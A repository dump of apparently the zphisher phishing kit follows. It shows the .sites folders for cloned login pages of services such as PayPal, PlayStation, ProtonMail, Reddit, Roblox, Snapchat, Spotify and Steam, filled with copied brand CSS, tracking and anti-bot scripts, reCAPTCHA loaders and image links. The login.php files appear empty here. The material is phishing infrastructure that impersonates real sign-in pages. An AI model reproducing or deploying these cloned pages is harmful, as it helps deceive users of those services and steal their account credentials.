4px;color:#141b20;background-color:#fff}nav.otknavbar{height:58px}a{text-decoration:none}a:hover{text-decoration:underline}a.otkbtn{text-decoration:none!important}body{font-family:'Open Sans',sans-serif;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;height:100%;min-height:100%;margin:0;overflow:hidden}.otknav.otknav-pills{border-bottom:1px solid #c3c6ce;height:58px;overflow:hidden;padding-left:40px}.otknav.otknav-pills li.otkpill-active:after{content:"";height:3px;width:100%;position:absolute;bottom:0;background:#f56c2d}section{height:calc(708px - 98px);padding:24px 40px;overflow:auto}section .otkbtn{margin:24px 0 6px 0}section h1{margin:12px 0 24px 0!important}.general-error{background:#d80000 url(../../../ui/core/img/background-general-error.png) right -49px;height:49px;overflow:hidden;display:none;width:100%;margin:0;padding:0}.otklabel{width:100%;display:block;margin:24px 0 12px 0}.otkform-group-help{display:none}p.otkform-group-help{margin:6px auto 12px auto}.otkform-group-haserror.otkform-group-help{display:block}.otkform{margin-bottom:24px}.otkcheckbox>label{vertical-align:middle;line-height:24px;white-space:normal}.otkcheckbox>input,.otkradio>input{display:block;opacity:0;position:absolute}.otkcheckbox.focus>label:before,.otkradio.focus>label:before,.otkselect.focus>.otkselect-label{border:1px solid #f56c2d}.otkbtn-primary.disabled{cursor:default;opacity:.45;pointer-events:none}select.disabled{pointer-events:none}.otknotice-stripe-message .otkicon{left:0}.otkform-group-field.otkicon{top:0;display:block}.otkicon-checkcircle,.otkicon-challenge{left:-18px;color:#04bd68;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning{left:-18px;color:#fea722;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning:before,.otkicon-checkcircle:before,.otkicon-challenge:before{display:block;font-size:96px}.right{float:right}.otkbtn:hover{background:#c85e36}footer{height:40px;margin:0;padding:0;top:0;border-radius:0 0 4px 4px;color:#787d85;background-color:#edf1f2;display:block;clear:both;position:relative;overflow:hidden}footer img{height:20px;margin:10px 12px 10px 24px}img{vertical-align:middle}.upgrade-privacy-friend{margin-bottom:12px;display:inline-block}.otkinput-capslock{display:none;position:absolute;top:50%;left:330px;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);z-index:2;color:#c3c6ce;font-size:32px}.otkicon-capslock-position{left:295px}.otkinput-capslock-visible{display:block}*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*{padding:0;margin:0;-webkit-backface-visibility:hidden} -------------------------------------------------------------------------------- /.sites/origin/originX-pc-login.css: -------------------------------------------------------------------------------- 1 | .otktooltip-bottom .otktooltip-arrow{top:2px}.otktooltip{margin:0;padding:0}.otktooltip-effect .otktooltip-bottom{position:relative;top:-5px;left:-44%;height:0}.otktooltip .otktooltip-inner{position:relative;top:7px;padding:10px 12px;text-align:left}#logViews section p{margin-bottom:24px}#loginBase .otkbtn{margin-top:6px;width:100%;max-width:100%}#loginBase .otkbtn-primary{margin-top:0}#passwordShow{position:absolute;top:0;right:14px;padding:6px;width:inherit!important;z-index:1}#passwordShow.otkbtn-light{color:#141b20;border:1px solid #c3c6ce;background:#edf1f2}#passwordShow.otkbtn-light:hover{background:#c3c6ce}.otktooltip-withcontent{display:inline-table;position:relative}#logViews .otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:16px;display:-webkit-inline-box;top:0}.clearfix:after,.tile-touch .otkscrim:after{content:"";display:table;clear:both}.captcha-container{list-style:outside none none}.recaptcha-form-default{padding:24px;border-radius:4px;background-color:#edf1f2;text-align:center;margin-bottom:24px}.recaptcha-form-default a{outline:0;text-decoration:none;position:relative;width:0;font-size:18px;color:#787d85;cursor:pointer;-webkit-transition:color .3s ease-in-out;-moz-transition:color .3s ease-in-out;-ms-transition:color .3s ease-in-out;-o-transition:color .3s ease-in-out;transition:color .3s ease-in-out}.otkfield-input{height:45px;padding:0 10px}.otkfield{position:relative;display:block;width:100%;margin:0;font-size:16px;font-weight:400;font-family:inherit;background:#fff;outline:0;border:1px solid #c3c6ce;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border-radius:4px;-moz-appearance:none;-webkit-appearance:none;appearance:none;-webkit-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.otkicon-refresh{margin:5px}.recaptcha-form-default input{width:200px;margin:auto}.recaptcha-form-default img{margin-top:18px;margin-bottom:18px;border-radius:4px;margin-left:30px}.recaptcha-form-default input:focus{border:1px solid #f56c2d!important;background:#fff;z-index:1;-webkit-box-shadow:0 0 1px 0 #f56c2d;box-shadow:0 0 1px 0 #f56c2d}#captcha-container2{margin-bottom:25px}#prepopulate-email .otkicon-profile{font-size:24px;color:#1e262c}#prepopulate-email{padding:10px}#prepopulate-email .otkicon-profile:before{content:"\e606"}#login-with-phone-number{display:inline-block;margin-top:6px;cursor:pointer}#logout-and-relogin{display:inline-block;margin-top:6px;cursor:pointer}.otkicon-warning{font-size:96px;left:-18px;color:#fea722}.otknotice-stripe{background-color:#22313c;color:#fff;position:fixed;z-index:0;top:0;height:0;width:100%;transition:all .6s cubic-bezier(0.03,1,0.2,1);text-align:center;overflow:hidden}.otknotice-error,.otknotice-passive,.otknotice-warning{background-color:#22313c;color:#fff}.otknotice-error+.views section,.otknotice-passive+.views section,.otknotice-warning+.views section{height:calc(708px - 150px)}.otknotice-stripe.otknotice-active{z-index:1000;padding:8px 0 16px 0;height:initial;transition:all .6s cubic-bezier(0.03,1,0.2,1)}.otknotice-stripe{position:static}.otknotice-stripe-message .otkicon{left:0}.otknotice-error .otkicon{color:#ff6550;font-size:24px;top:6px;padding-right:0}.otknotice-passive .otkicon{color:#2ac4f5;font-size:24px;top:6px;padding-right:0}.otknotice-warning .otkicon{color:#fea722;font-size:24px;top:6px;padding-right:0}.otkicon-warning:before{font-size:24px}.otkcheckbox>label,.otkradio>label{display:inline}.checkbox-login-first{display:block;margin-bottom:20px}.checkbox-login-last{display:block;margin-bottom:20px}.otktooltip-withcontent{display:inline-table;position:relative}.otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:17px;display:-webkit-inline-box;top:0}#check-phone-number-form{margin-bottom:25px}.phone-number-container .ptklabel{display:block;margin-bottom:10px}.phone-number-container .otktooltip-inner{padding:15px}.phone-number-container .otktooltip-arrow{bottom:-5px!important}.phone-number-input{display:flex}.phone-number-select{position:relative;width:30%}.phone-number-select select{border-bottom-right-radius:0}.phone-number-write{width:70%}.phone-number-write input{border-top-left-radius:0!important;border-bottom-left-radius:0!important}.phone-number-pad{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-pad,.phone-number-placeholder{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-placeholder{color:#787d85} -------------------------------------------------------------------------------- /.sites/origin/utag.js: -------------------------------------------------------------------------------- 1 | //tealium universal tag - utag.344 ut4.0.201610241851, Copyright 2016 Tealium.com Inc. All Rights Reserved. 2 | try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag.ut===undefined){utag.ut={};} 3 | if(utag.ut.loader===undefined){u.loader=function(o){var b,c,l,a=document;if(o.type==="iframe"){b=a.createElement("iframe");o.attrs=o.attrs||{"height":"1","width":"1","style":"display:none"};for(l in utag.loader.GV(o.attrs)){b.setAttribute(l,o.attrs[l]);}b.setAttribute("src",o.src);}else if(o.type=="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";for(l in utag.loader.GV(o.attrs)){b[l]=o.attrs[l];}b.src=o.src;}if(o.id){b.id=o.id};if(typeof o.cb=="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb()},false);}else{b.onreadystatechange=function(){if(this.readyState=='complete'||this.readyState=='loaded'){this.onreadystatechange=null;o.cb()}};}}l=o.loc||"head";c=a.getElementsByTagName(l)[0];if(c){utag.DB("Attach to "+l+": "+o.src);if(l=="script"){c.parentNode.insertBefore(b,c);}else{c.appendChild(b)}}}}else{u.loader=utag.ut.loader;} 4 | if(utag.ut.typeOf===undefined){u.typeOf=function(e){return({}).toString.call(e).match(/\s([a-zA-Z]+)/)[1].toLowerCase();};}else{u.typeOf=utag.ut.typeOf;} 5 | if(utag.ut.merge===undefined){u.merge=function(a,b,c,d){if(c){for(d in utag.loader.GV(b)){a[d]=b[d];}}else{for(d in utag.loader.GV(b)){if(typeof a[d]=="undefined"){a[d]=b[d];}}}};}else{u.merge=utag.ut.merge;} 6 | u.ev={"view":1,"link":1};u.initialized=false;u.scriptrequested=false;u.queue=[];u.event_lookup={"ViewContent":{obj:"vc","map":["value","currency","content_name","content_ids","content_category"]},"Search":{obj:"search","map":["value","currency","content_category","content_ids"]},"AddToCart":{obj:"cart","map":["value","currency","content_name","content_ids"]},"AddToWishlist":{obj:"wish","map":["value","currency","content_name","content_ids"]},"InitiateCheckout":{obj:"cout","map":["value","currency","content_name","content_ids","num_items"]},"AddPaymentInfo":{obj:"payment","map":["value","currency","content_category","content_ids"]},"Purchase":{obj:"purch","map":["value","currency","content_name","content_ids","num_items"]},"Lead":{obj:"lead","map":["value","currency","content_name","content_category"]},"CompleteRegistration":{obj:"reg","map":["value","currency","content_name"]},"Conversion":{obj:"cnv","map":["value","currency"]},"Custom":{obj:"cust","map":[]},"PageView":{obj:"page","map":[]}};u.std_params={"value":function(g,event){if(g.value===undefined||g.value===""){if(event==="ViewContent"||event==="AddToCart"){g.value=u.data.ecom.product_unit_price;}else{g.value=u.data.ecom.order_subtotal;}} 7 | g.value=u.val(g.value);},"currency":function(g){if(!g.currency){g.currency=u.data.ecom.order_currency;}},"content_name":function(g){if(!g.content_name){g.content_name=u.data.ecom.product_name;} 8 | g.content_name=u.val(g.content_name);},"content_ids":function(g){if(!g.content_ids){g.content_ids=u.data.ecom.product_id;} 9 | if(u.typeOf(g.content_ids)!=="array"){g.content_ids=g.content_ids.split(/\s*,\s*/);}},"content_category":function(g){if(!g.content_category){g.content_category=u.data.ecom.product_category;} 10 | g.content_category=u.val(g.content_category);},"num_items":function(g){if(!g.num_items&&u.data.calc_items==="true"){g.num_items=u.calc_items(u.data.ecom.product_quantity);}}};u.map_func=function(arr,obj,item){var i=arr.shift();obj[i]=obj[i]||{};if(arr.length>0){u.map_func(arr,obj[i],item);}else{obj[i]=item;}};u.val=function(value){return u.typeOf(value)==="array"?value[0]:value;};u.remove_empty=function(a){var b,t;for(b in utag.loader.GV(a)){t=u.typeOf(a[b]);if(t==="object"){u.remove_empty(a[b]);if(u.isEmptyObject(a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}}else if(!((a[b]===0||a[b]===false)?!0:(t==="array"&&a[b].length===0)?!1:!!a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}} 11 | return a;};u.calc_items=function(quan){var q,i=0;for(q=0;q 6 | -------------------------------------------------------------------------------- /.sites/paypal/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/pinterest/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/pinterest/favicon.png -------------------------------------------------------------------------------- /.sites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/pinterest/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/playstation/S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download: -------------------------------------------------------------------------------- 1 | /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ Function('var B=function(J,Q,W,v,a,g,u){J.L++;try{for(a=(g=(v=5001,W=J.l.length,0),void 0);(J.$||--v)&&(J.a||(g=J.C(215))a;a++)v[a]=String.fromCharCode(a);(V((V(J,(V(J,(V(J,(V(J,(V(J,74,(V(J,95,(V(J,(V(J,48,[160,0,(V(J,68,(V(J,(V(J,((V(J,(V(J,(V(J,(V(J,(V(J,(V(J,(a=(V(J,147,(V(J,166,(V(J,230,(V(J,(V(J,(J.i=(V(J,(V(J,(V(J,6,(V(J,113,(V((V(J,(V(J,111,(V(J,190,(J.uK=(V((V(J,(V(J,20,[0,(V(J,(V(J,196,((V(J,130,(V(J,(V(J,181,(J.pw=(V(J,219,(V(J,(J.a_=function(g){this.b=g},(J.b=J,J).w=(J.S=[],[]),215),0),0)),a=window.performance||{},a).timeOrigin||(a.timing||{}).navigationStart||0,function(g,u,k,F,t){V(g,(t=(k=(u=g.h(),g.h()),F=g.C(g.h()),g).C(g.h()),k=g.C(k),u),y(g,k,F,t))})),253),function(g){r(g,1)}),function(){})),V)(J,9,function(g,u,k,F){if(u=g.i.pop()){for(k=g.h();0>=(P=k&(1<<(F-=G,G))-1,G),P},t(3)+1),X=t(5),[]),0);I=P.length;)P.push(G.h());l=P[l]}O.push(l)}G.U=(G.a=G.v(h.slice(),G.h),G).v(O,G.h)})}),function(g,u){(u.push(g[0]<<24|g[1]<<16|g[2]<<8|g[3]),u).push(g[4]<<24|g[5]<<16|g[6]<<8|g[7]),u.push(g[8]<<24|g[9]<<16|g[10]<<8|g[11])}),function(g){Jh(g,1)})),q)(4)),129),J),J),80,function(g,u,k,F,t){for(t=(F=(u=g.h(),k=n(g),[]),0);t>k)})),function(g,u,k,F,t){(F=(k=(t=(u=(F=(k=(u=g.h(),g.h()),g).h(),g.C(u)),g).C(g.h()),g.C(k)),g).C(F),0!==u)&&(F=y(g,F,t,1,u,k),u.addEventListener(k,F,D),V(g,199,[u,k,F]))})),function(g,u,k){V(g,(u=(u=g.h(),k=g.h(),g.C(u)),k),gX(u))})),W.X||function(){}),30),function(g,u){E(g,1,5)||(u=Qg(g),V(g,u.I,u.H.apply(u.B,u.Y)))}),180),395),141),S),174),function(g,u,k){0!=(k=(u=g.h(),g.h()),g.C(u))&&V(g,215,g.C(k))}),50),function(g,u,k,F){(k=(u=g.h(),k=g.h(),F=g.h(),g).C(k),u=g.C(u),V)(g,F,u[k])}),126),2048),J).M=[],188),function(g,u,k,F,t,w,X){if(k=(u=g.h(),n(g)),F="",g.w[240])for(t=g.C(240),w=0,X=t.length;k--;)w=(w+n(g))%X,F+=v[t[w]];else for(;k--;)F+=v[g.h()];V(g,u,F)}),2),function(g){Jh(g,4)}),function(g,u,k){V(g,(u=(k=(u=g.h(),g.h()),g.w[u])&&g.C(u),k),u)})),0)]),208),function(g){g.G(4)}),[0,0,0])),[])),186),function(g,u,k){k=(u=g.h(),g.h()),V(g,k,""+g.C(u))}),V(J,47,function(g){r(g,4)}),225),function(g,u,k,F,t,w,X){E(g,1,5)||(u=Qg(g),k=u.Y,t=u.H,F=u.B,X=k.length,0==X?w=new F[t]:1==X?w=new F[t](k[0]):2==X?w=new F[t](k[0],k[1]):3==X?w=new F[t](k[0],k[1],k[2]):4==X?w=new F[t](k[0],k[1],k[2],k[3]):d(g,22),V(g,u.I,w))}),216),function(g,u,k,F){F=(k=(u=g.h(),g).h(),g.h()),g.b==g&&(g.C(u)[g.C(k)]=g.C(F),20==u&&(g.D=void 0,2==g.C(k)&&(g.N=void 0,V(g,215,g.C(215)+4))))}),182),function(g,u,k){V(g,(k=(u=g.h(),g).h(),k),g.C(k)+g.C(u))}),J),60,function(g){r(g,2)}),V)(J,241,function(g,u,k,F,t,w){if(!E(g,1,255)){if(g=(F=(u=(F=(k=(u=g.h(),g.h()),g).h(),t=g.h(),g).C(u),k=g.C(k),g).C(F),g).C(t),"object"==gX(u)){for(w in t=[],u)t.push(w);u=t}for(t=(F=(w=u.length,0>8&255,a&255]),void 0!=v&&Q.push(v),J.C(81).length)&&(J.w[81]=void 0,V(J,81,Q)),""),W&&(W.message&&(v+=W.message),W.stack&&(v+=":"+W.stack)),J).C(126),W)){(Q=(v=vm((W-=(v=v.slice(0,W-3),v.length+3),v.replace(/\\r\\n/g,"\\n"))),J.b),J).b=J;try{b(J,111,R(v.length,2).concat(v),9)}finally{J.b=Q}}V(J,126,W)},Wm={},m=function(J,Q){return J[Q]<<24|J[Q+1]<<16|J[Q+2]<<8|J[Q+3]},Qg=function(J,Q,W,v,a,g){for(a=(v=(W=(Q={},J.h()),Q.I=J.h(),Q.Y=[],J.b==J?J.h()-1:1),J.h()),g=0;g>>5)+Q^v+W[v&3],v+=3172301049,Q+=(J<<4^J>>>5)+J^v+W[v>>>11&3];return[J>>>24,J>>16&255,J>>8&255,J&255,Q>>>24,Q>>16&255,Q>>8&255,Q&255]}catch(a){throw a;}},gX=function(J,Q,W){if(Q=typeof J,"object"==Q)if(J){if(J instanceof Array)return"array";if(J instanceof Object)return Q;if(W=Object.prototype.toString.call(J),"[object Window]"==W)return"object";if("[object Array]"==W||"number"==typeof J.length&&"undefined"!=typeof J.splice&&"undefined"!=typeof J.propertyIsEnumerable&&!J.propertyIsEnumerable("splice"))return"array";if("[object Function]"==W||"undefined"!=typeof J.call&&"undefined"!=typeof J.propertyIsEnumerable&&!J.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==Q&&"undefined"==typeof J.call)return"object";return Q},vm=function(J,Q,W,v,a){for(Q=[],v=W=0;va?Q[W++]=a:(2048>a?Q[W++]=a>>6|192:(55296==(a&64512)&&v+1>18|240,Q[W++]=a>>12&63|128):Q[W++]=a>>12|224,Q[W++]=a>>6&63|128),Q[W++]=a&63|128);return Q},b=function(J,Q,W,v,a,g){if(J.b==J)for(a=J.C(Q),111==Q?(Q=function(u,k,F,t){if(a.c!=(F=(k=a.length,k)-4>>3,F)){F=(a.c=F,(F<<(t=[0,0,g[1],g[2]],3))-4);try{a.s=kt(m(a,F),m(a,F+4),t)}catch(w){throw w;}}a.push(a.s[k&7]^u)},g=J.C(95)):Q=function(u){a.push(u)},v&&Q(v&255),J=W.length,v=0;v=J.F--||J.O.push(254>=a?a:254)),W}},Y=function(J,Q,W){return(W=J.C(215),J.l&&WW;W++)Q[W]+=J[W];for(W=0,J=[13,8,13,12,16,5,3,10,15];9>W;W++)Q[3](Q,W%3,J[W])}};var U,r=((z.prototype.g=function(J,Q,W,v,a,g,u){if((Q=J[0],Q)==p){W=J[1];try{for(g=(W=(v=atob(W),[]),a=0);g>=8),W[a++]=u;this.l=W}catch(k){d(this,17,k)}B(this)}else if(Q==H)v=J[1],v.push(this.C(48).length,this.C(111).length,this.C(74).length,this.C(126)),V(this,167,J[2]),this.w[19]&&Y(this,this.C(19));else{if(Q==A){this.b=(u=(v=J[2],J=R(this.C(48).length+2,2),this.b),this);try{W=this.C(81),0>17,(Q=(Q^Q<<5)&W)||(Q=1),Q)},S.requestIdleCallback?function(J){requestIdleCallback(J,{timeout:4})}:S.setImmediate?function(J){setImmediate(J)}:function(J){setTimeout(J,0)}),function(J,Q,W,v){for(W=J.h(),v=0;0=J.W||1>>W)}catch(a){throw a;}},function(J,Q){if(Q=this.w[J],void 0===Q)throw d(this,30,0,J),this.J;return Q()}),function(J,Q,W,v){b((W=J.h(),v=J.h(),J),v,R(J.C(W),Q))}),Fs=(z.prototype.j="caller",z.prototype.h=(z.prototype.T=36,function(J,Q){if(this.a)return J=J?this.a().shift():this.U().shift(),this.a().length||this.U().length||(this.U=this.a=void 0,this.L--),J;if(!(J=this.C(215),J in this.l))throw d(this,31),this.J;return(V(((void 0==this.N&&(this.N=m(this.l,J-4),this.D=void 0),this.D)!=J>>3&&(this.D=J>>3,Q=this.C(20),this.K=kt(this.N,this.D,[0,0,Q[1],Q[2]])),this),215,J+1),this).l[J]^this.K[J%8]}),z.prototype.Lw=function(J,Q,W,v,a,g){for(W=[],g=v=0;g>v&255);return W},z.prototype.Z=35,function(J,Q,W,v,a){if((W=(J.o=false,Q)[0],W)==H)J.F=25,J.g(Q);else if(W==A){W=Q[v=Q[1],3];try{a=J.g(Q)}catch(g){c(J,g),a=J.f}(v&&v(a),W).push(a)}else if(W==M)J.g(Q);else if(W==p)J.g(Q);else if(W==Wm){try{for(a=0;a>6;return(v=new Number((J=(v+=v<<3,v^=v>>11,v+(v<<15)>>>0),J&(1<>>Q)%W,v}),{}),H=(z.prototype.$=false,z.prototype.m="toString",{}),R=function(J,Q,W,v){for(v=Q-1,W=[];0<=v;v--)W[Q-1-v]=J>>8*v&255;return W},f=(z.prototype.G=function(J,Q,W,v){b(this,(W=(Q=J&4,J&=3,this.h()),v=this.h(),W=this.C(W),Q&&(W=vm((""+W).replace(/\\r\\n/g,"\\n"))),J&&b(this,v,R(W.length,2)),v),W)},z.prototype.J=(U=S.botguard||(S.botguard={}),{}),function(J,Q){J.M.splice(0,0,Q)});(U.gLW=function(J,Q,W){this.invoke=(W=new z(J,{X:Q}),function(v,a,g){return(g=W.R(a&&v,g),v&&!a)&&v(g),g})},U).bg=function(J,Q,W){return J&&J.substring&&(W=U[J.substring(0,3)])?new W(J.substring(3),Q):new U.gLW(J,Q)};try{U.u||(S.addEventListener("unload",function(){},D),U.u=1)}catch(J){}try{S.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){D={passive:true}}}))}catch(J){};')(); -------------------------------------------------------------------------------- /.sites/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /.sites/playstation/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /.sites/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /.sites/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/playstation/kekka-22361ea3e8890b95e7b006a784440d01.css: -------------------------------------------------------------------------------- 1 | /** 2 | * kekka.css 3 | * Copyright 2016 Sony Corporation 4 | * 5 | */ 6 | 7 | * :not(p):not(h2):not(h3):not(ul):not(li){margin:0;padding:0;-webkit-tap-highlight-color:transparent}body,html{height:100%}body{overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,'Helvetica Neue',Helvetica,HiraKakuProN-W3,'Noto Sans CJK JP',sans-serif;-webkit-text-size-adjust:100%}span{unicode-bidi:embed}html{font-size:10px} 8 | -------------------------------------------------------------------------------- /.sites/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/loading.png -------------------------------------------------------------------------------- /.sites/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/loading_base.png -------------------------------------------------------------------------------- /.sites/playstation/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/logo_playstation.png -------------------------------------------------------------------------------- /.sites/playstation/saved_resource: -------------------------------------------------------------------------------- 1 | ndwti({"wi":"w-666234","wmd":{"ipr":{"fm":[],"lm":true,"tl":20000},"wk":{"r":"test"},"di":{"rt":128,"ut":512},"af":[]},"fd":{"ipr":"p","bi":"p","wt":"1.w-666234.1.2.4ODTuykD3bYvqj9RpaK5gw,,.I2PzRDkmu3FRo1eMxiTzb7fp9vKKTvu44DXdevnl1nf38CBmmTErco0FkBbSYGiiX1Iy6chd2bUFDuidinMfM7Et6PpjVbrSCaWoqZ3REB5jioKKtRRF_CYwy2Pe2KdMrSr1tPWzMnfKriMbHKEStZLeR0tj3FShVopqekSIwljoEtpOBBZMvXKezIF1CaqhjSKnH9JYg0l5yRw9UHN329dfmmixtzC1RF3ZrjKLTlTJrmC3TR2j3UxUU41NTKTtXNo33HJr-Z3ZCuKAzXhdyQ,,"},"gf":[]}) -------------------------------------------------------------------------------- /.sites/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/sony_logo.png -------------------------------------------------------------------------------- /.sites/playstation/vendor-571d67531622102402268bd2c623c17f.css: -------------------------------------------------------------------------------- 1 | .liquid-container{position:relative;overflow:hidden;-webkit-transform:translateY(0);-moz-transform:translateY(0);transform:translateY(0)}.liquid-child{overflow:hidden} -------------------------------------------------------------------------------- /.sites/playstation/wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/playstation/wallpaper.jpg -------------------------------------------------------------------------------- /.sites/protonmail/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/protonmail/bg.jpg -------------------------------------------------------------------------------- /.sites/protonmail/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/protonmail/favicon.ico -------------------------------------------------------------------------------- /.sites/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/protonmail/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/quora/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /.sites/quora/iframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.sites/quora/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/quora/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/reddit/art.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/reddit/art.png -------------------------------------------------------------------------------- /.sites/reddit/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/reddit/favicon.png -------------------------------------------------------------------------------- /.sites/reddit/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/reddit/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /.sites/roblox/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/roblox/favicon.ico -------------------------------------------------------------------------------- /.sites/roblox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/roblox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/snapchat/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/snapchat/favicon.png -------------------------------------------------------------------------------- /.sites/snapchat/icon.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 8 | 9 | 10 | 25 | 26 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /.sites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/spotify/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/spotify/favicon.ico -------------------------------------------------------------------------------- /.sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/stackoverflow/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/stackoverflow/favicon.ico -------------------------------------------------------------------------------- /.sites/stackoverflow/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/stackoverflow/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/steam/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/steam/1.jpg 